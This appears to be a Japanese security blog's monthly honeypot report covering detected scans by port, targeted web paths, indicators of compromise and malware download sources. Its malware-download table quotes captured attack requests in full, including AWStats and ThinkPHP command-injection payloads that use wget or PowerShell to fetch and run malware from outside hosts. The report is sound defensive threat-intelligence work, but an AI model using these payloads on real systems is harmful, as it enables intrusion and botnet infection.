sec-chick Blog

サイバーセキュリティブログ

【ハニーポット月次分析】Honeypot 6月度〜VNC宛て通信増加中〜

Honeypot 月次分析6月度となります。来月からはsuricataも導入しているので来月はそちらの分析も出来ればと思っています。

 

ハニーポット月次分析】Honeypot 6月度
◾️Honeytrap(80ポートは除く)

<検知数>

f:id:one-chick-sec:20190713213831p:plain

6/9の検知数が多いですが、これはポート14791宛にRDP向けの通信が多数発生したことが原因となっいます。
ペイロード
Cookie: mstshash=Test

 

突発的に増加する大半はRDPへの通信であり、外部からアクセスできた場合、攻撃者側のリターンが大きくため、定期的に検知しているのではないかと推測しています。

 

<ポート別検知数_前月差(Honeytrap)>

ポート番号 サービス 件数 件数差(前月)
5900 vnc 149714 128430
445 smb 106044 -903
23 telnet 42814 -4681
110 pop3 29107 28940
3389 rdp 8278 -28026
3306 mysql 6438 430
10630   6218 6215
25 smtp 3783 -1410
5432   3300 -21480
2323 telnet 2447 -1128

<ポート別検知数_90日平均差(Honeytrap)>

ポート番号 サービス 件数 件数差(90日平均)
5900 vnc 149714 109398
445 smb 106044 633
23 telnet 42814 -8308
110 pop3 29107 27848
14791 Unknown 15851 15841
3389 rdp 8278 -6869
3306 mysql 6438 -3071
10630 Unknown  6218 6215
25 smtp 3783 1182
5432 Unknown  3300 -5132


vncおよびpop3宛てのポートへの通信が増加していました。どちらの通信も特に通信内容はなくポートが空いているかどうか調査しているものでした。vncについてはBluekeepでリモートアクセスに関する脆弱性によって検知数が増えたのかもしれません。
また、他のサービスがUnknownであるものはRDPへの不正アクセスを狙ったものでした。

マルウェアダウンロード  対象別集計>

対象 検知数
Realtek SDK 713
webshell 87
MVPower DVR 73
Huawei Home Device 71
Redis 59
Android Debug Bridge 53
Weblogic 29
Linksys ルータ 18
Apache Struts2 12
Elasticsearch 4
ZyXEL社ルータ 3
AVTECH 1

Realtek SDK を対象とした MiraiおよびGafgytのダウンロード狙ったものを多く検知していました。また、webshellやradisの検知もそこそこ検知いました。


◾️WoWHoneypot
<検知数>

f:id:one-chick-sec:20190713215412p:plain


<ターゲット別検知数 TOP10>

target count
Tomcat 7362
WordPress 2138
- 848
FreePBX 732
IP camera 284
phpMyAdmin 167
Unauthorized Relay 137
Zabbix 42
ThinkPHP 15
.env file 14

Tomcatのコンソールへの不正アクセスを狙ったものが継続して多く検知していました。一方でIP cameraを狙った攻撃などもあり、徐々にIoTを狙った攻撃も増加傾向にあると思われます。

<検知パス TOP10>

wow_path_research target CVE reference count
/manager/html Tomcat - - 7362
/wp-login.php WordPress - - 956
/ - - - 795
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 732
/tmpfs/auto.jpg IP camera - - 284
/xmlrpc.php WordPress - - 136
/wp5/wp-login.php WordPress - - 95
/wp2/wp-login.php WordPress - - 93
/forum/wp-login.php WordPress - - 90
/wp/wp-login.php WordPress - - 90

HTTPパスではTomcatマネージャへの不正アクセスが他のパスと比べて頭一つ多く検知していました。他はFreePBX、Wordpressを狙った攻撃を多く検知していました。

マルウェアダウンロード>

MalwareDownload path payload count
hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]x86 /awstatstotals/awstatstotals.php GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1..sort=].phpinfo().exit().$a[.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).Connection: Close.. 1
hxxp://fid[.]hognoob[.]se/download[.]exe /public/hydra.php GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. 1
hxxp://fid[.]hognoob[.]se/download[.]exe /public/index.php GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid[.]hognoob[.]se/download[.]exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. 1

hydra.phpやindex.phpは他の攻撃によって設置されたWebshellであり、Webshellが設置されていた場合、マルウェアがダウンロードされるものとなります。拡張子がexeファイルであることからターゲットOSはwindowsを狙ったものとなります。
https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369
https://sec-owl.hatenablog.com/entry/2019/01/17/014528

<IoC情報>
WoWHoneypot

path target CVE reference
/ - - -
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743
/siteblog/wp-login.php WordPress - -
/myblog/wp-login.php WordPress - -
/forum1/wp-login.php WordPress - -
/WordPress9/wp-login.php WordPress - -
/WordPress8/wp-login.php WordPress - -
/WordPress7/wp-login.php WordPress - -
/WordPress6/wp-login.php WordPress - -
/WordPress4/wp-login.php WordPress - -
/WordPress3/wp-login.php WordPress - -
/WordPress2/wp-login.php WordPress - -
/WordPress1/wp-login.php WordPress - -
/wp8/wp-login.php WordPress - -
/wp7/wp-login.php WordPress - -
/wp5/wp-login.php WordPress - -
/wp4/wp-login.php WordPress - -
/wp3/wp-login.php WordPress - -
/test/wp-login.php WordPress - -
/wp1/wp-login.php WordPress - -
/site/wp-login.php WordPress - -
/blog/wp-login.php WordPress - -
/forum/wp-login.php WordPress - -
/WordPress/wp-login.php WordPress - -
/wp/wp-login.php WordPress - -
/wp-login.php WordPress - -
/favicon.ico - - -
/wp2/wp-login.php WordPress - -
hxxp://110[.]249[.]212[.]46/testget Unauthorized Relay - -
/TP/public/index.php ThinkPHP - -
/robots.txt - - -
///wp-json/wp/v2/users/ WordPress - -
/// - - -
/Temporary_Listen_Addresses/WSMAN Microsoft SharePoint  CVE-2019-0604 https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild
hxxp://172[.]247[.]32[.]25/ddd[.]html Unauthorized Relay - -
/PMA/scripts/setup.php phpMyAdmin - -
/~riba/pma/scripts/setup.php phpMyAdmin - -
/alt/sqladmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin-2.8.0.4/scripts/setup.php phpMyAdmin - -
/pyaniste/mysqladmin/scripts/setup.php phpMyAdmin - -
/admincooptel/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/phpmyadmin.box25/scripts/setup.php phpMyAdmin - -
/phpmy/scripts/setup.php\ phpMyAdmin - -
/phpMyAdmin-www072510/scripts/setup.php phpMyAdmin - -
/phpmy/scripts/setup.php phpMyAdmin - -
/phpmyadmin/scripts/setup.php/index.php phpMyAdmin - -
/php/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/admin/scripts/setup.php phpMyAdmin - -
/php/scripts/setup.php phpMyAdmin - -
/php-my-admin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin2/scripts/setup.php phpMyAdmin - -
/sqladmin/scripts/setup.php phpMyAdmin - -
/db/scripts/setup.php phpMyAdmin - -
/websql/scripts/setup.php phpMyAdmin - -
/admin/phpmyadmin/scripts/setup.php phpMyAdmin - -
/_phpMyAdmin/scripts/setup.php phpMyAdmin - -
/configuracion/phpmyadmin/scripts/setup.php phpMyAdmin - -
/web/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/pHpMyAdMiN/scripts/setup.php phpMyAdmin - -
/MySQL/scripts/setup.php phpMyAdmin - -
/mysqladmin/scripts/setup.php phpMyAdmin - -
/scripts/setup.php phpMyAdmin - -
/MyAdmin/scripts/setup.php phpMyAdmin - -
/w00tw00t.at.blackhats.romanian.anti-sec:) phpMyAdmin - -
/epgrec/do-record.sh epgrec - http://www.mda.or.jp/epgrec/index.php/epgrec%E3%81%AE%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB%E3%81%A8%E8%A8%AD%E5%AE%9A
/foltia/ foltia ANIME LOCKER - https://sec-owl.hatenablog.com/entry/2018/08/01/004310
/_async/AsyncResponseService Oracle WebLogic Server CVE-2019-2725 https://www.secure-sketch.com/blog/verify-oracle-weblogic-vulnerability
/.git/config git - -
/siteblog//wp-json/wp/v2/users/ WordPress - -
/siteblog// WordPress - -
/myblog//wp-json/wp/v2/users/ WordPress - -
/myblog// WordPress - -
/forum1//wp-json/wp/v2/users/ WordPress - -
/forum1// WordPress - -
/WordPress9//wp-json/wp/v2/users/ WordPress - -
/WordPress9// WordPress - -
/WordPress8//wp-json/wp/v2/users/ WordPress - -
/WordPress8// WordPress - -
/WordPress7//wp-json/wp/v2/users/ WordPress - -
/WordPress7// WordPress - -
/WordPress6//wp-json/wp/v2/users/ WordPress - -
/WordPress6// WordPress - -
/WordPress5//wp-json/wp/v2/users/ WordPress - -
/WordPress5// WordPress - -
/WordPress5/wp-login.php WordPress - -
/WordPress4//wp-json/wp/v2/users/ WordPress - -
/WordPress4// WordPress - -
/WordPress3//wp-json/wp/v2/users/ WordPress - -
/WordPress3// WordPress - -
/WordPress2//wp-json/wp/v2/users/ WordPress - -
/WordPress2// WordPress - -
/WordPress1//wp-json/wp/v2/users/ WordPress - -
/WordPress1// WordPress - -
/wp8//wp-json/wp/v2/users/ WordPress - -
/wp8// WordPress - -
/wp7//wp-json/wp/v2/users/ WordPress - -
/wp7// WordPress - -
/wp5//wp-json/wp/v2/users/ WordPress - -
/wp5// WordPress - -
/wp4//wp-json/wp/v2/users/ WordPress - -
/wp4// WordPress - -
/wp3//wp-json/wp/v2/users/ WordPress - -
/wp3// WordPress - -
/wp2//wp-json/wp/v2/users/ WordPress - -
/wp2// WordPress - -
/downloader/ - - -
/wp1//wp-json/wp/v2/users/ WordPress - -
/wp1// WordPress - -
/site//wp-json/wp/v2/users/ WordPress - -
/site// WordPress - -
/test//wp-json/wp/v2/users/ WordPress - -
/test// WordPress - -
/blog//wp-json/wp/v2/users WordPress - -
/blog//wp-json/wp/v2/users/ WordPress - -
/blog// WordPress - -
/forum//wp-json/wp/v2/users/ WordPress - -
/forum// WordPress - -
/WordPress//wp-json/wp/v2/users/ WordPress - -
/WordPress// WordPress - -
/wp//wp-json/wp/v2/users/ WordPress - -
/wp// WordPress - -
hxxp://112[.]124[.]42[.]80:63435/ Unauthorized Relay - -
/Temporary_Listen_Addresses/SMSSERVICE Microsoft SharePoint  CVE-2019-0604 https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild
/manager/html Tomcat - -
/app/.env .env file - -
/phpmyadmin/index.php phpMyAdmin - -
/index.php - - -
/HNAP1 D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981
/evox/about Trane Tracer SC - https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327
/Nmap/folder/check1558950064 Nmap - -
/NmapUpperCheck1558950064 Nmap - -
/sdk Vmware - https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse
/nmaplowercheck1558950064 Nmap - -
/Nmap/folder/check1558937902 Nmap - -
/NmapUpperCheck1558937902 Nmap - -
/nmaplowercheck1558937902 Nmap - -
/_search Elasticsearch CVE-2015-1427 https://www.morihi-soc.net/?p=442
/autodiscover Zimbra  - https://www.exploit-db.com/exploits/46967
/HNAP1/ D-Link DIR-850L CVE-2015-2051 https://www.morihi-soc.net/?p=981
/.git/HEAD git - -
/ipc$ IPC - https://thinline196.hatenablog.com/entry/2018/09/23/153019
/webdav/ WebDAV - -
hxxp://www[.]baidu[.]com/ Unauthorized Relay - -
www.baidu.com:443 Unauthorized Relay - -
hxxp://www[.]123cha[.]com/ Unauthorized Relay - -
cn.bing.com:443 Unauthorized Relay - -
hxxp://www[.]ip[.]cn/ Unauthorized Relay - -
hxxp://123[.]125[.]114[.]144/ Unauthorized Relay - -
/tmpfs/auto.jpg IP camera - -
/admin/config.php Admin config - -
hxxp://112[.]35[.]53[.]83:8088/index[.]php Unauthorized Relay - -
hxxp://5[.]188[.]210[.]101/echo[.]php Unauthorized Relay - -
/queryUserList Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC}  - https://github.com/mcw0/PoC/blob/master/TVT-PoC.py
/web/cgi-bin/hi3510/param.cgi Zivif Web CVE-2017-17106 https://sec-owl.hatenablog.com/entry/2018/09/24/011848
/system.ini Microsoft Windows  3.1 System - https://www.weblio.jp/content/system.ini
/device.rsp TBK Vision DVR  CVE-2018-9995 https://windabaft.co.jp/blog_ceo/?p=458
/System/configurationFile/ Hikvision IP camera - https://mogu2itachi.hatenablog.com/entry/2019/04/07/065650
/RPC2_Login dahua camera - https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d
/\cgi-bin/login.cgi CGI - -
/\cgi-bin/get_status.cgi /\cgi-bin/get_status.cgi - -
/scripts/setup.php/index.php phpMyAdmin - -
/PHPMYADMIN/scripts/setup.ph phpMyAdmin - -
/phpMyAdmin/setup.php/index.php phpMyAdmin - -
/phpmyadmin/setup.php phpMyAdmin - -
/.env .env file - -
//blog/ WordPress - -
/acadmin.php Webshell - -
/current_config/passwd dahua camera - https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
/cgi-bin/user/Config.cgi AVTECH AVN801 DVR CVE-2013-4981 https://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-006100.html
/device_description.xml UPnP - https://medium.com/@djboris/digging-into-upnp-by-searching-a-sonos-api-5e10e080a232
/login.html login Page - -
/winbox.png MikroTik - https://sec-owl.hatenablog.com/entry/2018/10/12/160525
/currentsetting.htm NETGEAR Genie - https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/qnfxcjqr Webshell - -
/fdsrwe Webshell - -
/images/logo.gif - - -
/home.asp ASP - -
/tmpfs/snap.jpg IP camera - https://www.ispyconnect.com/man.aspx?n=IPCMontor
/phpmyadmin/ phpMyAdmin - -
/sitemap.xml xml sitemap - -
/login.cgi login Page - -
/.well-known/security.txt SSL certificate - https://qiita.com/comefigo/items/e9b1bce93c1b615e5934
/mysql/admin/index.php phpMyAdmin - -
/redirect.php PHP - -
//about.php PHP - -
//admin/config.php Admin config - -
//recordings/ FreePBX - https://cute-0tter.hatenablog.com/entry/2019/02/25/235730
//a2billing/customer/templates/default/footer.tpl FreePBX - https://cute-0tter.hatenablog.com/entry/2019/02/25/235730
//vtigercrm/vtigerservice.php vtiger vtiger CRM 5.2.1 - https://www.securityfocus.com/bid/47267/info
hxxp://160[.]16[.]145[.]183/ Unauthorized Relay - -
/wp-admin/ WordPress - -
/admin.php WordPress - https://nskw-style.com/2014/diary/visualize-wp-admin-flow.html
/ccvv Unknown - -
/index.do Apache Struts2 CVE-2017-5638 https://www.morihi-soc.net/?p=654
/index.action Apache Struts2 CVE-2017-5638 https://github.com/mazen160/struts-pwn
/struts2-rest-showcase/orders.xhtml Apache Struts2 CVE-2017-5638 https://blue-blue.hatenablog.com/entry/2017/03/12/212730
/server-status Apache Server - https://github.com/mazen160/server-status_PWN
/developer/.env .env file - -
/public/.env .env file - -
/backup/.env .env file - -
/portal/.env .env file - -
/api/.env .env file - -
/mobile/.env .env file - -
/dev/.env .env file - -
/m/.env .env file - -
/admin/.env .env file - -
/web/.env .env file - -
/phpmyadmin phpMyAdmin - -
/qzone/ - - -
xui.ptlogin2.qq.com:443 Unauthorized Relay - -
/console/login/LoginForm.jsp Oracle WebLogic Server CVE-2015-4852 https://www.exploit-db.com/exploits/46628
hxxp://check[.]proxyradar[.]com/azenv[.]php Unauthorized Relay - -
/usr/share/phpmyadmin/libraries/select_lang.lib.php phpMyAdmin - -
/phpMyAdmin/scripts/db___.init.php phpMyAdmin - -
/phpMyAdmin-2.11.1-all-languages/scripts/setup.php phpMyAdmin - -
/sqladm/scripts/setup.php phpMyAdmin - -
/setup.php PHP - -
/pma2012/ phpMyAdmin - -
/pma2011/ phpMyAdmin - -
/phpadmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin-2.5.5/scripts/setup.php phpMyAdmin - -
/dbadmin/scripts/setup.php phpMyAdmin - -
/jmx-console/ Jboss CVE-2010-0738 https://www.rapid7.com/db/modules/exploit/multi/http/jboss_maindeployer
* - - -
/shop/wp-includes/wlwmanifest.xml WordPress - -
/wp-includes/wlwmanifest.xml WordPress - -
/website/wp-includes/wlwmanifest.xml WordPress - -
/cms/wp-includes/wlwmanifest.xml WordPress - -
/wp/wp-includes/wlwmanifest.xml WordPress - -
/site/wp-includes/wlwmanifest.xml WordPress - -
/dev/wp-includes/wlwmanifest.xml WordPress - -
/wwww/wp-includes/wlwmanifest.xml WordPress - -
/web/wp-includes/wlwmanifest.xml WordPress - -
/WordPress/wp-includes/wlwmanifest.xml WordPress - -
/blog/wp-includes/wlwmanifest.xml WordPress - -
/2017/wp-login.php WordPress - -
/1/wp-login.php WordPress - -
/myforum/wp-login.php WordPress - -
/teststite/wp-login.php WordPress - -
/vlog/wp-login.php WordPress - -
/shop/wp-login.php WordPress - -
/nx8j78af1b.jsp Webshell - -
/blog2/wp-login.php WordPress - -
/upload/bank-icons/bank_16.png Unknown - -
/upload/bank-icons/bank-gh.jpg Unknown - -
hxxp://api[.]ipify[.]org/ Unauthorized Relay - -
hxxp://112[.]35[.]88[.]28:8088/index[.]php Unauthorized Relay - -
/3/wp-login.php WordPress - -
/backup/ - - -
/dbadmin/ phpMyAdmin - -
/myadmin/ phpMyAdmin - -
/pma/ phpMyAdmin - -
/admin/ - - -
/db/ - - -
/mysite/wp-login.php WordPress - -
/2/wp-login.php WordPress - -
/2018/wp-login.php WordPress - -
/news/wp-login.php WordPress - -
/blog3/wp-login.php WordPress - -
/2019/wp-login.php WordPress - -
/index_main.php Unknown - -
/warning.html Unknown - -
/xmlrpc.php WordPress - -
/user/login.html Unknown - -
hxxp://185[.]172[.]110[.]221:80/proxy_get[.]php Unauthorized Relay - -
/public/hydra.php Webshell - https://sec-owl.hatenablog.com/entry/2019/01/17/014528
/public/index.php - - -
/login - - -
/backup - - -
hxxp://112[.]35[.]66[.]7:8088/index[.]php Unauthorized Relay - -
hxxp://185[.]172[.]110[.]221/check[.]php Unauthorized Relay - -
/main.php - - -
/api_jsonrpc.php Zabbix - -
/zabbix/api_jsonrpc.php Zabbix - https://www.exploit-db.com/exploits/39937
//proxies.php Zabbix - -
/zabbix//proxies.php Zabbix - -
/zabbix/jsrpc.php Zabbix - -
/jsrpc.php Zabbix - -
/zabbix//httpmon.php Zabbix - -
//httpmon.php Zabbix - -
hxxp://112[.]35[.]63[.]31:8088/index[.]php Unauthorized Relay - -
/forum1/xmlrpc.php WordPress - -
/wp8/xmlrpc.php WordPress - -
/WordPress8/xmlrpc.php WordPress - -
/siteblog/xmlrpc.php WordPress - -
/myblog/xmlrpc.php WordPress - -
/WordPress9/xmlrpc.php WordPress - -
/WordPress3/xmlrpc.php WordPress - -
/WordPress6/xmlrpc.php WordPress - -
/wp7/xmlrpc.php WordPress - -
/WordPress1/xmlrpc.php WordPress - -
/wp5/xmlrpc.php WordPress - -
/test/xmlrpc.php WordPress - -
/wp4/xmlrpc.php WordPress - -
/wp3/xmlrpc.php WordPress - -
/wp1/xmlrpc.php WordPress - -
/site/xmlrpc.php WordPress - -
/wp2/xmlrpc.php WordPress - -
/forum/xmlrpc.php WordPress - -
/wp/xmlrpc.php WordPress - -
/WordPress/xmlrpc.php WordPress - -
/WordPress7/xmlrpc.php WordPress - -
/WordPress4/xmlrpc.php WordPress - -
/WordPress2/xmlrpc.php WordPress - -
/blog/xmlrpc.php WordPress - -
/moo Unknown - -
/html/.env .env file - -
/Nmap/folder/check1560131930 Nmap - -
/NmapUpperCheck1560131930 Nmap - -
/nmaplowercheck1560131930 Nmap - -
/shell Webshell - -
//MyAdmin/scripts/setup.php phpMyAdmin - -
//phpMyAdmin/scripts/setup.php phpMyAdmin - -
//pma/scripts/setup.php phpMyAdmin - -
/CFIDE/administrator/ Adobe ColdFusion - https://www.exploit-db.com/exploits/14641
/muieblackcat Scanner - https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/
/smartdomuspad/modules/reporting/track_import_export.php U.motion Builder  CVE-2018-7841 https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day/
/images/favicon.ico - - -
/scripts/ajaxPortal.lua VMware NSX SD-WAN Edge by VeloCloud CVE-2018-6961 https://www.exploit-db.com/exploits/44959
185.172.110.221:80 Unauthorized Relay - -
/awstatstotals/awstatstotals.php AWStats Totals CVE-2008-3922 https://www.bugsearch.net/en/11876/awstats-totals-v114-multisort-remote-command-execution-cve-2008-3922.html
/laravel/.env .env file - -
/.bitcoin/.env .env file - -
hxxp://10010[.]ah165[.]net:8088/hsp/out_of_service[.]jsp Unauthorized Relay - -
/index.html - - -
/Login.htm - - -
/PMA2005/ phpMyAdmin - -
/SQLite/main.php SQLiteManager - -
/SQLiteManager-1.2.4/main.php SQLiteManager - -
/SQLiteManager/main.php SQLiteManager - -
/agSearch/SQlite/main.php SQLiteManager - -
/hudson/script Unknown - -
/mysql-admin/ phpMyAdmin - -
/mysql/ phpMyAdmin - -
/mysqladmin/ phpMyAdmin - -
/mysqlmanager/ phpMyAdmin - -
/nagiosxi/images/loginsplash.png phpMyAdmin - -
/openserver/phpmyadmin/ phpMyAdmin - -
/p/m/a/ phpMyAdmin - -
/php-my-admin/ phpMyAdmin - -
/php-myadmin/ phpMyAdmin - -
/phpMyAdmin-2.2.3/ phpMyAdmin - -
/phpMyAdmin-2.2.6/ phpMyAdmin - -
/phpMyAdmin-2.5.1/ phpMyAdmin - -
/phpMyAdmin-2.5.4/ phpMyAdmin - -
/phpMyAdmin-2.5.5-pl1/ phpMyAdmin - -
/phpMyAdmin-2.5.5-rc1/ phpMyAdmin - -
/phpMyAdmin-2.5.5-rc2/ phpMyAdmin - -
/phpMyAdmin-2.5.5/ phpMyAdmin - -
/phpMyAdmin-2.5.6-rc1/ phpMyAdmin - -
/phpMyAdmin-2.5.6-rc2/ phpMyAdmin - -
/phpMyAdmin-2.5.6/ phpMyAdmin - -
/phpMyAdmin-2.5.7-pl1/ phpMyAdmin - -
/phpMyAdmin-2.5.7/ phpMyAdmin - -
/phpMyAdmin-2.6.0-alpha/ phpMyAdmin - -
/phpMyAdmin-2.6.0-alpha2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-beta2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc2/ phpMyAdmin - -
/phpMyAdmin-2.6.0-rc3/ phpMyAdmin - -
/phpMyAdmin-2.6.0/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.1-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.1-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.1-rc2/ phpMyAdmin - -
/phpMyAdmin-2.6.1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-beta1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.2-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.2/ phpMyAdmin - -
/phpMyAdmin-2.6.3-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.3-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.3/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl1/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl2/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl3/ phpMyAdmin - -
/phpMyAdmin-2.6.4-pl4/ phpMyAdmin - -
/phpMyAdmin-2.6.4-rc1/ phpMyAdmin - -
/phpMyAdmin-2.6.4/ phpMyAdmin - -
/phpMyAdmin-2.7.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.7.0-pl1/ phpMyAdmin - -
/phpMyAdmin-2.7.0-pl2/ phpMyAdmin - -
/phpMyAdmin-2.7.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.7.0/ phpMyAdmin - -
/phpMyAdmin-2.8.0-beta1/ phpMyAdmin - -
/phpMyAdmin-2.8.0-rc1/ phpMyAdmin - -
/phpMyAdmin-2.8.0-rc2/ phpMyAdmin - -
/phpMyAdmin-2.8.0.1/ phpMyAdmin - -
/phpMyAdmin-2.8.0.2/ phpMyAdmin - -
/phpMyAdmin-2.8.0.3/ phpMyAdmin - -
/phpMyAdmin-2.8.0.4/ phpMyAdmin - -
/phpMyAdmin-2.8.0/ phpMyAdmin - -
/phpMyAdmin-2.8.1-rc1/ phpMyAdmin - -
/phpMyAdmin-2.8.1/ phpMyAdmin - -
/phpMyAdmin-2.8.2/ phpMyAdmin - -
/phpMyAdmin-2/ phpMyAdmin - -
/phpMyAdmin2/ phpMyAdmin - -
/phpmanager/ phpMyAdmin - -
/phpmy-admin/ phpMyAdmin - -
/script - - -
/sqlmanager/ SQLiteManager - -
/sqlweb/ SQL - -
/systemInfo Unknown - -
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php SQLiteManager - -
/webadmin/ SQL - -
/webdb/ SQL - -
/websql/ SQL - -
hxxp://www[.]msftncsi[.]com/ncsi[.]txt Unauthorized Relay - -
/.html - - -
hxxp://110[.]249[.]212[.]46/testget Unauthorized Relay - -
hxxp://5[.]188[.]210[.]101/echo.php Unauthorized Relay - -
/id_rsa ssh - -
/smb_scheduler/ SimBankSchedulerServer - https://docuri.com/download/smb-server-install-guide_59c1dfd7f581710b2869684b_pdf
/user// - - -
/user//wp-json/wp/v2/users/ WordPress - -
/user/wp-login.php WordPress - -
/user/xmlrpc.php WordPress - -
/Nmap/folder/check1562208120 Nmap - -
/NmapUpperCheck1562208120 Nmap - -
/nmaplowercheck1562208120 Nmap - -
/user/soapCaller.bs Morfeus Fucking Scanner - https://kaworu.jpn.org/kaworu/2008-12-27-1.php
hxxp://160[.]16[.]145[.]183/QUERY/en-us/msdn/ Unauthorized Relay - -
/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup Zyxel CVE-2017-6884 https://www.exploit-db.com/exploits/41782
/myadmin/scripts/setup.php phpMyAdmin - -
/phpMyAdmin/scripts/setup.php phpMyAdmin - -
/phpmyadmin/scripts/setup.php phpMyAdmin - -
/pma/scripts/setup.php phpMyAdmin - -


<マルウェアダウンロード>

宛先ポート ダウンロード先 攻撃元IP
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 167[.]99[.]99[.]163
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 159[.]203[.]65[.]214
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 159[.]203[.]4[.]33
52869 hxxp://185[.]52[.]2[.]192/Demon[.]mips 138[.]68[.]58[.]92
52869 hxxp://91[.]209[.]70[.]174/Corona[.]mips 185[.]244[.]25[.]92
52869 hxxp://174[.]128[.]226[.]101/kr 107[.]173[.]222[.]169
52869 hxxp://174[.]128[.]226[.]101/kr 198[.]23[.]214[.]17
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
8161 lsd[.]systemten[.]org 160[.]16[.]221[.]15
52869 hxxp://174[.]128[.]226[.]101/kr 107[.]173[.]222[.]169
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 113[.]141[.]72[.]248
60001 hxxp:/\/185[.]244[.]25[.]185/bins/Jaws[.]sh 109[.]238[.]12[.]68
6381 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
52869 hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips 178[.]62[.]220[.]251
8161 lsd[.]systemten[.]org 160[.]16[.]221[.]15
6380 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
